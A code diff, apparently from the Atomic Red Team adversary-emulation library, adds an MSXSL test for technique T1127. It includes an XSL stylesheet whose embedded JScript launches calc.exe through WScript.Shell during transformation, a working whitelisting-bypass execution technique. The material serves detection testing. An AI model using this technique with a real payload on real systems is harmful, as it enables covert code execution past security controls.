Add MSXSL test to T1127

atomics/T1127/T1127.yaml

@@ -16,3 +16,22 @@ atomic_tests:
     name: command_prompt
     command: |
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe #{filename}
+
+- name: MSXSL Bypass
+  description: |
+    Executes the code specified within a XSL script tag during XSL transformation. Requires download of MSXSL from Microsoft.
+  supported_platforms:
+    - windows
+  input_arguments:
+    xmlfile:
+      description: Location of the test XML file. May be a URL.
+      type: Path
+      default: C:\AtomicRedTeam\atomics\T1127\src\msxsl-xmlfile.xml
+    xslfile:
+      description: Location of the test XSL script file. May be a URL.
+      type: Path
+      default: C:\AtomicRedTeam\atomics\T1127\src\msxsl-script.xsl
+  executor:
+    name: command_prompt
+    command: |
+     C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile}

atomics/T1127/src/msxsl-script.xsl

@@ -0,0 +1,15 @@
+<?xml version='1.0'?>
+<xsl:stylesheet version="1.0"
+xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
+xmlns:msxsl="urn:schemas-microsoft-com:xslt"
+xmlns:user="http://mycompany.com/mynamespace">
+ 
+<msxsl:script language="JScript" implements-prefix="user">
+   function xml(nodelist) {
+var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /c C:\Windows\System32\calc.exe");
+   return nodelist.nextNode().xml;
+   }
+</msxsl:script>
+<xsl:template match="/">
+   <xsl:value-of select="user:xml(.)"/>
+</xsl:template>

atomics/T1127/src/msxsl-xmlfile.xml

@@ -0,0 +1,7 @@
+<?xml version="1.0"?>
+<?xml-stylesheet type="text/xsl" href="msxsl-script.xsl" ?>
+<customers>
+<customer>
+<name>Microsoft</name>
+</customer>
+</customers>